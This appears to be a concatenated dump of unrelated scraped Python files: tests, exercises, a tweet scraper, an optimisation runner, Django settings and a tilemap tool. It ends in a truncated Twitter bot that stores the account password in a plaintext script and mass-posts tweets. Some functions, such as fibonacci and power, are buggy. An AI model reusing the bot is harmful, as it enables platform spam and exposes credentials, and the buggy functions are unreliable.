\".pdb\"\n cifPath = code + \".cif\"\n\n self.finaliseLigand ( code,xyzPath,cifPath )\n\n # close execution logs and quit\n self.success()\n return\n\n\n# ============================================================================\n\nif __name__ == \"__main__\":\n\n drv = MakeLigand ( \"\",os.path.basename(__file__) )\n drv.start()\n","sub_path":"pycofe/tasks/makeligand.py","file_name":"makeligand.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"232397616","text":"#pylint: disable=missing-docstring\n#pylint: disable=unused-variable\n\nimport pytest\nfrom functions.auth_functions import auth_register\nfrom functions.channel_functions import channels_create, channel_invite\nfrom functions.data import reset_data, is_member\n\nfrom functions.exceptions import ValueError\n\n#The only channels and users that exist are those created from\n#this test. When you create a channel you join it.\n######################## BEGIN SETUP ######################\ndef setup():\n reset_data()\n dict1 = auth_register('email1@gmail.com', 'validpass', 'Yasin', 'Kevin')\n token1 = dict1['token']\n u_id1 = dict1['u_id']\n\n dict2 = auth_register('email2@gmail.com', 'validpass', 'Peter', 'Steven')\n token2 = dict2['token']\n u_id2 = dict2['u_id']\n\n dict3 = auth_register('email3@gmail.com', 'validpass', 'Yasin', 'Peter')\n token3 = dict3['token']\n u_id3 = dict3['u_id']\n\n return token1, u_id1, token2, u_id2, token3, u_id3\n########################## END SETUP ########################\n\n\n#invite second user(member) to public channel created by first user(admin)\ndef test_channel_invite_test_1():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel['channel_id']\n\n assert channel_invite(token1, channel_id1, u_id2) == {}\n assert is_member(u_id2, channel_id1)\n\n\n#invite first user(admin) to private channel created by second user(member)\ndef test_channel_invite_test_2():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel = channels_create(token2, 'someChannel', 'false')\n channel_id1 = channel['channel_id']\n\n assert channel_invite(token2, channel_id1, u_id1) == {}\n assert is_member(u_id1, channel_id1)\n\n\n#invite multiple people (2 users)\ndef test_channel_invite_test_3():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel['channel_id']\n\n assert channel_invite(token1, channel_id1, u_id2) == {}\n assert channel_invite(token1, channel_id1, u_id3) == {}\n\n assert is_member(u_id2, channel_id1)\n assert is_member(u_id3, channel_id1)\n\n#inviting user to channel with a channel_id that does not exist i.e.\n#(channel_id1 + channel_id2)\ndef test_channel_invite_test_4():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel1 = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel1['channel_id']\n\n channel2 = channels_create(token1, 'someChannel2', 'true')\n channel_id2 = channel2['channel_id']\n\n with pytest.raises(ValueError):\n channel_invite(token1, channel_id1 + channel_id2, u_id2)\n\n#inviting user with user_id that does not exist (U_id1 + u_id2)\ndef test_channel_invite_test_5():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel1 = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel1['channel_id']\n\n channel2 = channels_create(token1, 'someChannel2', 'true')\n channel_id2 = channel2['channel_id']\n\n with pytest.raises(ValueError):\n channel_invite(token1, channel_id2, u_id1 + u_id2)\n\n#both user_id and channel_id do not exist\ndef test_channel_invite_test_6():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel1 = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel1['channel_id']\n\n channel2 = channels_create(token1, 'someChannel2', 'true')\n channel_id2 = channel2['channel_id']\n\n with pytest.raises(ValueError):\n channel_invite(token1, channel_id1 + channel_id2, u_id1 + u_id2)\n\n\n\n#user is already in the channel so cant invite himself\ndef test_channel_invite_test_7():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel['channel_id']\n\n with pytest.raises(ValueError):\n channel_invite(token1, channel_id1, u_id1)\n","sub_path":"backend/channel_invite_test.py","file_name":"channel_invite_test.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"240800549","text":"#!/usr/bin/env python\n\"\"\"Implements math functions without using operators except for '+' and '-' \"\"\"\n\n__author__ = \"earthhadjo\"\n\nimport sys\n\n\ndef add(x, y):\n \"\"\"Add two integers. Handles negative values.\"\"\"\n return(x + y)\n\n\ndef multiply(x, y):\n \"\"\"Multiply x with y. Handles negative values of x or y.\"\"\"\n if y < 0:\n result = -multiply(x, -y)\n elif y == 0:\n result = 0\n elif y == 1:\n result = x\n else:\n result = x + multiply(x, y - 1)\n return(result)\n\n\ndef power(x, n):\n \"\"\"Raise x to power n, where n >= 0\"\"\"\n total = x\n i = 1\n while i < n:\n x = multiply(total, x)\n i += 1\n return(x)\n\n\ndef factorial(x):\n \"\"\"Compute factorial of x, where x > 0\"\"\"\n n = 1\n i = 1\n while i <= x:\n n = multiply(n, i)\n i += 1\n return(n)\n\n\ndef fibonacci(n):\n \"\"\"Compute the nth term of fibonacci sequence\"\"\"\n x = 0\n y = 1\n i = 0\n for i in range(n):\n x = y\n y = i\n i = add(x, y)\n return(i)\n\n\ndef main():\n print(add(2, 4))\n print(multiply(6, -8))\n\n print(power(2, 8))\n print(factorial(4))\n print(fibonacci(8))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"152638390","text":"import tweepy\nfrom tweepy import RateLimitError\nimport time\nimport json\nimport pandas as pd\nimport csv\n\ndef authTwitter():\n twitter_auth_data = open(\"twitter_auth_data.json\").read()\n twitter_auth_data_json = json.loads(twitter_auth_data)\n\n access_token = twitter_auth_data_json[\"access_token\"]\n access_token_secret = twitter_auth_data_json[\"access_token_secret\"]\n consumer_key = twitter_auth_data_json[\"consumer_key\"]\n consumer_secret = twitter_auth_data_json[\"consumer_secret\"]\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n\n return api\n\n\n\"\"\"\n file_path: path to SNScrape File\n Take a file from SNScrape and loads the urls into a list\n Return: list of urls\n\"\"\"\ndef loadUlrs(file_path):\n ulrs = []\n with open(file_path) as f:\n urls = f.readlines()\n\n return [url.strip() for url in urls]\n\n\ndef getTweetId(url):\n return url.split('/')[-1]\n\ndef getTweet(api, url):\n\n tweetid = getTweetId(url)\n\n try:\n status = api.get_status(tweetid, tweet_mode=\"extended\")\n return parseTweet(status)\n\n except RateLimitError as err:\n print(\"Rate Limit Triggerd. Sleeping for 15mins\")\n time.sleep(60 * 15)\n\ndef parseTweet(status):\n \n data = {\n \"id\": status.id,\n \"username\": status.user.screen_name,\n \"text\": status.full_text.replace('\\n', ''),\n \"date\": str(status.created_at),\n \"location\": status.user.location\n }\n\n return data\n\ndef generateCSV(tweet_list, output_path):\n data_file = open(output_path, 'w') \n csv_writer = csv.writer(data_file)\n\n header = tweet_list[0].keys()\n csv_writer.writerow(header)\n\n for tweet in tweet_list:\n csv_writer.writerow(tweet.values())\n\n data_file.close\n\n\nif __name__ == \"__main__\":\n\n urls = loadUlrs('test.txt')\n api = authTwitter()\n\n tweets = []\n status_counter = 0\n for url in urls:\n tweets.append(getTweet(api, url))\n if(status_counter % 5 == 0 ):\n print(f\"Completed: {status_counter}/{len(tweets)}\")\n status_counter += 1\n\n generateCSV(tweets, 'tweetdata.csv')\n\n\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"550895354","text":"'''Runs DE on XGBoostBenchmark\n'''\n\nimport os\nimport sys\nsys.path.append(os.path.join(os.getcwd(), '../HPOlib3/'))\n\nimport json\nimport pickle\nimport argparse\nimport numpy as np\n\nfrom hpolib.benchmarks.ml.xgboost_benchmark import XGBoostBenchmark as Benchmark\nfrom hpolib.util.openml_data_manager import get_openmlcc18_taskids\n\nfrom dehb import DE, AsyncDE\n\n\n# task_ids = get_openmlcc18_taskids()\ntask_ids = [126031, 189906, 167155] # as suggested by Philip\n\n\ndef save_configspace(cs, path, filename='configspace'):\n fh = open(os.path.join(path, '{}.pkl'.format(filename)), 'wb')\n pickle.dump(cs, fh)\n fh.close()\n\n\n# Common objective function for DE representing XGBoostBenchmark\ndef f(config, budget=None):\n global n_estimators, max_budget\n if budget is None:\n budget = max_budget\n res = b.objective_function(config, n_estimators=n_estimators, subsample=budget)\n fitness = res['function_value']\n cost = res['cost']\n return fitness, cost\n\n\ndef calc_test_scores(runtime, history):\n global n_estimators\n regret_validation = []\n regret_test = []\n inc = np.inf\n test_regret = 1\n for i in range(len(history)):\n config, valid_score, _ = history[i]\n if valid_score < inc:\n inc = valid_score\n config = de.vector_to_configspace(config)\n test_res = b.objective_function_test(config, n_estimators=n_estimators)\n test_score = test_res['function_value']\n regret_test.append(test_score)\n regret_validation.append(inc)\n runtime = np.cumsum(runtime).tolist()\n res = {}\n res['regret_validation'] = regret_validation\n res['regret_test'] = regret_test\n res['runtime'] = runtime\n return res\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--fix_seed', default='False', type=str, choices=['True', 'False'],\n nargs='?', help='seed')\nparser.add_argument('--run_id', default=0, type=int, nargs='?',\n help='unique number to identify this run')\nparser.add_argument('--runs', default=None, type=int, nargs='?', help='number of runs to perform')\nparser.add_argument('--run_start', default=0, type=int, nargs='?',\n help='run index to start with for multiple runs')\nparser.add_argument('--task_id', default=task_ids[0], type=int,\n help=\"specify the OpenML task id to run on from among {}\".format(task_ids))\nparser.add_argument('--n_estimators', default=64, type=int,\n help=\"specify the number of estimators XGBoost will be trained with\")\nparser.add_argument('--gens', default=100, type=int, nargs='?',\n help='(iterations) number of generations for DE to evolve')\nparser.add_argument('--output_path', default=\"./results\", type=str, nargs='?',\n help='specifies the path where the results will be saved')\nparser.add_argument('--pop_size', default=20, type=int, nargs='?', help='population size')\nstrategy_choices = ['rand1_bin', 'rand2_bin', 'rand2dir_bin', 'best1_bin', 'best2_bin',\n 'currenttobest1_bin', 'randtobest1_bin',\n 'rand1_exp', 'rand2_exp', 'rand2dir_exp', 'best1_exp', 'best2_exp',\n 'currenttobest1_exp', 'randtobest1_exp']\nparser.add_argument('--strategy', default=\"rand1_bin\", choices=strategy_choices,\n type=str, nargs='?',\n help=\"specify the DE strategy from among {}\".format(strategy_choices))\nparser.add_argument('--mutation_factor', default=0.5, type=float, nargs='?',\n help='mutation factor value')\nparser.add_argument('--crossover_prob', default=0.5, type=float, nargs='?',\n help='probability of crossover')\nparser.add_argument('--max_budget', default=1, type=float,\n help='the maximum budget for the benchmark')\nparser.add_argument('--verbose', default='False', choices=['True', 'False'], nargs='?', type=str,\n help='to print progress or not')\nparser.add_argument('--folder', default=None, type=str, nargs='?',\n help='name of folder where files will be dumped')\nparser.add_argument('--async_strategy', default=None, type=str, nargs='?',\n choices=['deferred', 'immediate', 'random', 'worst'],\n help='type of Asynchronous DE')\n\nargs = parser.parse_args()\nargs.verbose = True if args.verbose == 'True' else False\nargs.fix_seed = True if args.fix_seed == 'True' else False\nn_estimators = args.n_estimators\nmax_budget = args.max_budget\n\ntask_ids = get_openmlcc18_taskids()\nif args.task_id not in task_ids:\n raise \"Incorrect task ID. Choose from: {}\".format(task_ids)\n\nb = Benchmark(task_id=args.task_id)\n# Parameter space to be used by DE\ncs = b.get_configuration_space()\ndimensions = len(cs.get_hyperparameters())\n\nif args.async_strategy is None:\n folder = \"de_pop{}\".format(args.pop_size)\nelse:\n folder = \"ade_{}_pop{}\".format(args.async_strategy, args.pop_size)\noutput_path = os.path.join(args.output_path, str(args.task_id), folder)\nos.makedirs(output_path, exist_ok=True)\n\n# Initializing DE object\nif args.async_strategy is None:\n de = DE(cs=cs, dimensions=dimensions, f=f, pop_size=args.pop_size,\n mutation_factor=args.mutation_factor, crossover_prob=args.crossover_prob,\n strategy=args.strategy, budget=max_budget)\nelse:\n de = AsyncDE(cs=cs, dimensions=dimensions, f=f, pop_size=args.pop_size,\n mutation_factor=args.mutation_factor, crossover_prob=args.crossover_prob,\n strategy=args.strategy, budget=max_budget, async_strategy=args.async_strategy)\n\nif args.runs is None: # for a single run\n if not args.fix_seed:\n np.random.seed(args.run_id)\n # Running DE iterations\n traj, runtime, history = de.run(generations=args.gens, verbose=args.verbose)\n fh = open(os.path.join(output_path, 'run_{}.json'.format(args.run_id)), 'w')\n json.dump(calc_test_scores(runtime, history), fh)\n fh.close()\nelse: # for multiple runs\n for run_id, _ in enumerate(range(args.runs), start=args.run_start):\n if not args.fix_seed:\n np.random.seed(run_id)\n if args.verbose:\n print(\"\\nRun #{:<3}\\n{}\".format(run_id + 1, '-' * 8))\n # Running DE iterations\n traj, runtime, history = de.run(generations=args.gens, verbose=args.verbose)\n fh = open(os.path.join(output_path, 'run_{}.json'.format(run_id)), 'w')\n json.dump(calc_test_scores(runtime, history), fh)\n fh.close()\n if args.verbose:\n print(\"Run saved. Resetting...\")\n # essential step to not accumulate consecutive runs\n de.reset()\n\nsave_configspace(cs, output_path)\n","sub_path":"dehb/examples/cc18/run_de_cc18.py","file_name":"run_de_cc18.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"417514294","text":"\"\"\"\nSettings file used in development at the local machine\n\"\"\"\n\nfrom .base import *\n\nDEBUG = False\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'sentinel/sentinel/static')\n\nALLOWED_HOSTS = ['localhost']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'sentineldb',\n 'USER': get_secret_setting('DB_USERNAME'),\n 'PASSWORD': get_secret_setting('DB_PASSWORD'),\n 'HOST': 'localhost',\n 'PORT': '3306',\n }\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '[%(asctime)s] %(levelname)s\\t[%(name)s:%(lineno)s] '\n '%(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S'\n },\n 'detail': {\n 'format': '[%(asctime)s] %(levelname)s\\t%(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'detail'\n },\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'filename': '/var/log/sentinel.log',\n 'formatter': 'detail',\n },\n 'db_logger': {\n 'class': 'system.db.log_handler.DatabaseLogHandler',\n 'formatter': 'detail'\n }\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n 'device': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n 'sensor': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n 'notify': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n 'settings': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n },\n}\n","sub_path":"sentinel/sentinel/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"281272288","text":"import asyncio\nimport json\nfrom autobahn.asyncio.websocket import WebSocketServerProtocol\nfrom web.server.requestToResponder import getResponder\n\n\nclass ServerProtocol(WebSocketServerProtocol):\n\n # ERROR TYPE CODES\n ERROR_NO_MESSAGE_TYPE = \"MessageType not given in request.\"\n ERROR_NO_RESPONDER = \"Could not find appropriate Responder.\"\n ERROR_NO_PAYLOAD = \"Message contained no payload.\"\n ERROR_NOT_STRUCTURED = \"Message payload was not structured.\"\n\n def __init__(self):\n WebSocketServerProtocol.__init__(self)\n self.requestID = \"\"\n\n def onConnect(self, requestID):\n self.requestID = requestID\n\n @asyncio.coroutine\n def onMessage(self, payload, isBinary):\n if isBinary:\n return\n requestJSON = json.loads(payload.decode(\"utf-8\"))\n print(\"Client -> Server : {}\".format(requestJSON))\n\n if \"messageType\" not in requestJSON:\n self.sendError(ServerProtocol.ERROR_NO_MESSAGE_TYPE)\n return\n if \"payload\" not in requestJSON:\n self.sendError(ServerProtocol.ERROR_NO_PAYLOAD)\n return\n\n responderClass = getResponder(requestJSON[\"messageType\"])\n if responderClass is None:\n self.sendError(ServerProtocol.ERROR_NO_RESPONDER)\n return\n responder = responderClass(self.requestID, requestJSON[\"payload\"])\n if not responder.isRequestStructured(requestJSON[\"payload\"].keys()):\n self.sendError(ServerProtocol.ERROR_NOT_STRUCTURED)\n return\n response = yield from responder.getResponse()\n if response is not None:\n responseJSON = {\"messageType\": responder.responseType, \"payload\": response}\n print(\"Client <- Server : {}\".format(responseJSON))\n self.sendMessage(json.dumps(responseJSON).encode(\"utf-8\", \"ignore\"))\n\n def sendError(self, errorCode):\n \"\"\"\n Sends an error message to the client with\n the corresponding code.\n\n :param errorCode: Error type to send to client.\n :return: None\n \"\"\"\n errorResponse = json.dumps({\"messageType\": \"error\", \"payload\": {\"reason\": errorCode}})\n print(\"Client <- Server : {}\".format(errorResponse))\n self.sendMessage(errorResponse.encode(\"utf-8\", \"ignore\"))\n self.sendClose(1000)\n","sub_path":"web/server/serverProtocol.py","file_name":"serverProtocol.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"392258046","text":"'''\nGiven a 32-bit signed integer, reverse digits of an integer.\n\nInput: 123\nOutput: 321\n\nInput: -123\nOutput: -321\n\nInput: 120\nOutput: 21\n\nInput: 2**31 - 1 \nOutput: 0 \n\n''' \n\n# O(log(x)), space O(1)\n\ndef reverse(x):\n reverse = 0 \n negative = x < 0 \n \n if negative: \n x *= -1 \n \n while x > 0: \n reverse *= 10 #push\n reverse += x % 10 #push and pop (x%10) \n x //= 10 # continue pop operation\n \n if negative: \n reverse *= -1\n \n if reverse > 2**31-1 or reverse < -2**31: \n return 0 \n \n return reverse \n\n\nprint(reverse(123)) # 321\nprint(reverse(-123)) # -321\nprint(reverse(-2147483648)) # 0\nprint(reverse(2147483647)) # 0\n","sub_path":"LeetCode/ReverseInteger.py","file_name":"ReverseInteger.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"179540033","text":"from multiprocessing import Process, Lock\r\n\r\nclass SMS_split(object):\r\n '''split the sms_list for sending '''\r\n def __init__(self,package_size,phone_list):\r\n self.phone_list = phone_list\r\n self.package_size = package_size\r\n self.package = [elem for elem in range(package_size)] \r\n self._lock = Lock()\r\n \r\n def __iter__(self):\r\n #the number of sms which already have be splited \r\n self.current_spot = 0\r\n return self\r\n \r\n def next(self):\r\n self._lock.acquire()\r\n try:\r\n if (self.current_spot >= len(self.phone_list)):\r\n self.current_spot = len(self.phone_list)\r\n raise StopIteration\r\n self.package = self.phone_list[self.current_spot : \\\r\n\t\t\t\t\t\t\t\t\t\t self.current_spot+self.package_size]\r\n self.current_spot += self.package_size\r\n finally: \r\n self._lock.release()\r\n return self.package\r\n\r\n def set_package_size(self, package_size):\r\n self.package_size = package_size\r\n def get_package_size(self):\r\n return self.package_size\r\n\r\n def get_already_send_num(self):\r\n return self.current_spot\r\n\r\nif __name__ == \"__main__\":\r\n a = [elem for elem in range(13000000000,13000000500,1)]\r\n\r\n tmp = SMS_split(32,a);\r\n for elem in tmp:\r\n tmp.set_package_size(tmp.get_package_size()*2)\r\n print (elem,\" : \",len(elem))\r\n","sub_path":"spliter/sms_splite/sms_splite.py","file_name":"sms_splite.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"337864133","text":"import tensorflow as tf \nimport numpy as np \nimport resource\n\n\n# This function will convert the info of the used RAM for GB or MB \ndef convert_KB(val):\n\n\tresult = 0.0\n\n\t# Convert KB to GB\n\tif val >= 1048576:\n\t\tresult = val/1048576\n\t\treturn \"Used {}GB of RAM\".format(round(result,2))\n\t\n\t#Converto KB to MB\n\telse:\n\t\tresult = val/1024\n\t\treturn \"Used {}MB of RAM\".format(round(result,2))\n\n\nprint(\"EXERCISE 1\",end='\\n\\n')\nprint(\"Create a large matrix (at least 10,000,000) of integer values (for example, use NumPy’s randint function). Check the memory usage after the matrix is created. Then, convert the matrix to float values using TensorFlow’s to_float function. Check the memory usage again to see an increase in memory usage of more than double. The “doubling” is caused by a copy of the matrix being created, but what is the cause of the “extra increase”?\",end='\\n\\n')\n\nsession = tf.InteractiveSession()\n\ntensor_arr = tf.constant(np.random.randint(10000000))\n\n#print(tensor_arr.eval())\n\nprint(convert_KB(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss))\n\ntensor_arr = tf.to_float(tensor_arr)\n\n#print(tensor_arr.eval())\n\nprint(convert_KB(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss))\n\nsession.close()","sub_path":"Interactive Session/Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"141567946","text":"#!/usr/bin/env python\n# -*- coding: windows-1252 -*-\n\n# author: diego.hahn\n#\n\n# HARDCODED AO EXTREMO :D \n\nimport os\nimport struct\nimport sys\nimport array\n\ndef vertical(buffer):\n c = ''\n for y in range(8)[::-1]:\n c += buffer[4*y:4*(y+1)]\n return c\n\ndef horizontal(buffer):\n c = ''\n for y in range(8):\n reverse = buffer[4*y:4*(y+1)][::-1]\n for w in range(4):\n c += chr((ord(reverse[w]) << 4 | ord(reverse[w]) >> 4) & 0xFF)\n return c\n \ndef diagonal(buffer):\n return horizontal(vertical(buffer))\n\ndef create_tilesdict( buff , codec ):\n tilesdict = {}\n if codec == 4:\n length = len(buff) / 32\n for x in range(length):\n tilesdict.update({x:buff[32*x:32*(x+1)]})\n else:\n length = len(buff) / 64\n for x in range(length):\n tilesdict.update({x:buff[64*x:64*(x+1)]})\n return tilesdict\n\ndef reduce_tilesdict( tilesdict ):\n offset = 0 \n reduced_tilesdict = dict()\n for x in tilesdict: \n if reduced_tilesdict.has_key(tilesdict[x]):\n continue\n elif reduced_tilesdict.has_key(horizontal(tilesdict[x])):\n continue\n elif reduced_tilesdict.has_key(vertical(tilesdict[x])):\n continue\n elif reduced_tilesdict.has_key(diagonal(tilesdict[x])):\n continue \n else:\n reduced_tilesdict.update({tilesdict[x]:offset})\n offset += 1 \n # inverte o dicionário\n ret = dict()\n for k,v in reduced_tilesdict.items():\n ret.update({v:k})\n \n return ret \n\ndef EncodeImage( src, dst, map, full, entry, codec ):\n # Monta o tileset a partir da imagem full (concatenação de todas as imagens)\n with open( full, \"rb\" ) as fd : \n tilesdict = create_tilesdict( fd.read() , codec )\n # Simplifica o dicionário de tiles para apenas tiles únicos\n reduced_td = reduce_tilesdict(tilesdict)\n \n # Monta o tileset\n tileset = array.array(\"c\")\n out = open( dst, \"wb\" )\n for i in range(len(reduced_td)):\n tileset.extend(reduced_td[i])\n out.write(reduced_td[i]) \n out.close()\n \n with open( src, \"rb\" ) as fd:\n tilesdict = create_tilesdict( fd.read() , codec )\n \n # Monta o tilemap - a informação da paleta de cores vem do tilemap original\n tilemap = list()\n val = reduced_td.values()\n for i in range(len(tilesdict)):\n if tilesdict[i] in val:\n tilemap.append( 0x0000 | val.index(tilesdict[i]))\n elif horizontal(tilesdict[i]) in val:\n tilemap.append( 0x0400 | val.index(horizontal(tilesdict[i])))\n elif vertical(tilesdict[i]) in val:\n tilemap.append( 0x0800 | val.index(vertical(tilesdict[i])))\n elif diagonal(tilesdict[i]) in val:\n tilemap.append( 0x0C00 | val.index(diagonal(tilesdict[i]))) \n else:\n raise Exception\n sys.exit(1)\n\n size = 0x20*0x20\n # Atualiza o tilemap\n with open(map, \"r+b\") as fd: \n palette = []\n for i in range(size):\n palette.append(struct.unpack(\"<H\", fd.read(2))[0] & 0xF000)\n\n fd.seek(0)\n for i in range(size):\n fd.write(struct.pack(\"<H\", palette[i] | tilemap[i]))\n\ndef DecodeImage( src, dst, map, entry, codec ):\n\n # Leitura do tilemap\n with open( src, \"rb\" ) as fd:\n tilesdict = create_tilesdict( fd.read() , codec )\n \n with open(map, \"rb\") as fd:\n\n size = 0x20*0x20\n out = open( dst, \"wb\" )\n for _ in range( size ):\n key = struct.unpack( \"<H\" , fd.read(2))[0] \n \n # TODO - Imagens com multiplas paletas\n key &= 0xFFF\n \n if (key & 0xC00) == 0xC00 :\n out.write(diagonal(tilesdict[(key & 0x3FF)]))\n elif (key & 0x800) == 0x800:\n out.write(vertical(tilesdict[(key & 0x3FF)]))\n elif (key & 0x400) == 0x400:\n out.write(horizontal(tilesdict[(key & 0x3FF)]))\n else:\n out.write(tilesdict[(key & 0x3FF)]) \n \n out.close()\n\nif __name__ == \"__main__\":\n \n import argparse\n \n os.chdir( sys.path[0] )\n #os.system( 'cls' )\n\n parser = argparse.ArgumentParser()\n parser.add_argument( '-m', dest = \"mode\", type = str, required = True )\n parser.add_argument( '-s', dest = \"src\", type = str, nargs = \"?\", required = True )\n parser.add_argument( '-d', dest = \"dst\", type = str, nargs = \"?\", required = True )\n parser.add_argument( '-t', dest = \"map\", type = str, nargs = \"?\", required = True )\n parser.add_argument( '-f', dest = \"full\", type = str, nargs = \"?\" )\n parser.add_argument( '-e', dest = \"entry\", type = int, required = True )\n parser.add_argument( '-c', dest = \"codec\", type = int, required = True )\n \n args = parser.parse_args() \n\n if args.mode == \"u\":\n DecodeImage( args.src , args.dst , args.map , args.entry , args.codec )\n elif args.mode == \"p\":\n EncodeImage( args.src , args.dst , args.map, args.full , args.entry , args.codec )\n ","sub_path":"asm/tool_lmlevel/tool_tilemap.py","file_name":"tool_tilemap.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"513375722","text":"import os\nimport time\nfrom random import *\nos.system(\"chmod +x greet\")\nos.system(\"bash greet\")\nwhile True:\n\tprint(\"\\nEnter Your username/Phone :\")\n\tuser=input().strip()\n\tprint(\"\\nEnter Your Password :\")\n\tpas=input().strip()\n\tprint(\"\\nEnter Tweet List File Path\")\n\tpath=input().strip()\n\tprint(\"\\nEnter Additional Things to Put Like #SpeedX or @SpeedX\")\n\tadd=input().strip()\n\tprint(\"\\nEnter Delay Between Tweets (in milliseconds) (1000 ms = 1 s)\")\n\tdelay=int(input())\n\tprint(\"Your Twitter Username : \\\"\"+user+\"\\\"\")\n\tprint(\"\\nYour Twitter Password : \\\"\"+pas+\"\\\"\")\n\tprint(\"\\nFile Containing Tweets : \\\"\"+path+\"\\\"\")\n\tprint(\"\\nAdd Text : \\\"\"+add+\"\\\" To Each Tweet\")\n\tprint(\"\\nDelay Between 2 Tweets : \\\"\"+str(delay)+\"\\\"\")\n\tprint(\"\\nPress Y To Continue...\\nPres N To Edit...\")\n\tch=input().strip()\n\tif (ch.find('y') != -1 or ch.find('Y') != -1):\n\t\tbreak\nprint(\"\\n\\n\\nLogging in...\")\nf=open(\"init\",\"w\")\ns1=\"# Command logfile created by Lynx 2.8.9rel.1 SpeedX\\n# Arg0 = lynx\\n# Arg1 = http://mobile.twitter.com/session/new\\n# Arg2 = -cmd_log=init\"\ns1=s1+\"\\nkey Down Arrow\\nkey Down Arrow\"\ns2=\"\"\ns3=\"\"\nfor s in user:\n\ts2=s2+\"\\nkey \"+s\nfor s in pas:\n\ts3=s3+\"\\nkey \"\n\tif s == ' ':\n\t\ts3=s3+\"<space>\"\n\telse:\n\t\ts3=s3+s\ns3=s3+\"\\nkey Down Arrow\\nkey Right Arrow\"\nf.write(s1)\nf.write(s2)\nf.write(\"\\nkey Down Arrow\")\nf.write(s3)\nf.write(\"\\nkey q\\nkey y\")\nf.close()\nos.system(\"lynx http://mobile.twitter.com/session/new -cmd_script=init\")\nprint(\"\\nLogged in Successfully!!\")\nprint(\"\\nLoading Tweet List...\")\nf=open(path,\"r\")\nt=f.read()\nf.close()\ntl=t.split(\"\\n\")\nprint(str(len(tl))+\" Tweets Loaded !!!\")\nprint(\"Starting To Tweet !!!\")\nn=0\nfirst=\"\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Right Arrow\\nkey Down Arrow\\nkey Down Arrow\"\nlast=\"\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Right Arrow\\nkey q\\nkey y\"\nfor tweet in tl:\n\tif tweet.strip() == \"\":\n\t\tcontinue\n\tn=n+1\n\ttweet=add+\" \"+tweet\n\tf1=open(\"tweetspeedx\"+str(n),\"w\")\n\tf1.write(\"key Right Arrow\")\n\tf1.write(first)\n\tfor st in tweet:\n\t\tf1.write(\"\\nkey \")\n\t\tif st == ' ':\n\t\t\tf1.write(\"<space>\")\n\t\telse:\n\t\t\tf1.write(st)\n\tf1.write(last)\n\tf1.close()\n\tos.system(\"lynx -cfg=./lynx.cfg http://mobile.twitter.com -cmd_script=tweetspeedx\"+str(n))\n\tprint(\"Tweet Number: \"+str(n))\n\tprint(\"Tweeted: \"+tweet)\n\tos.system(\"rm 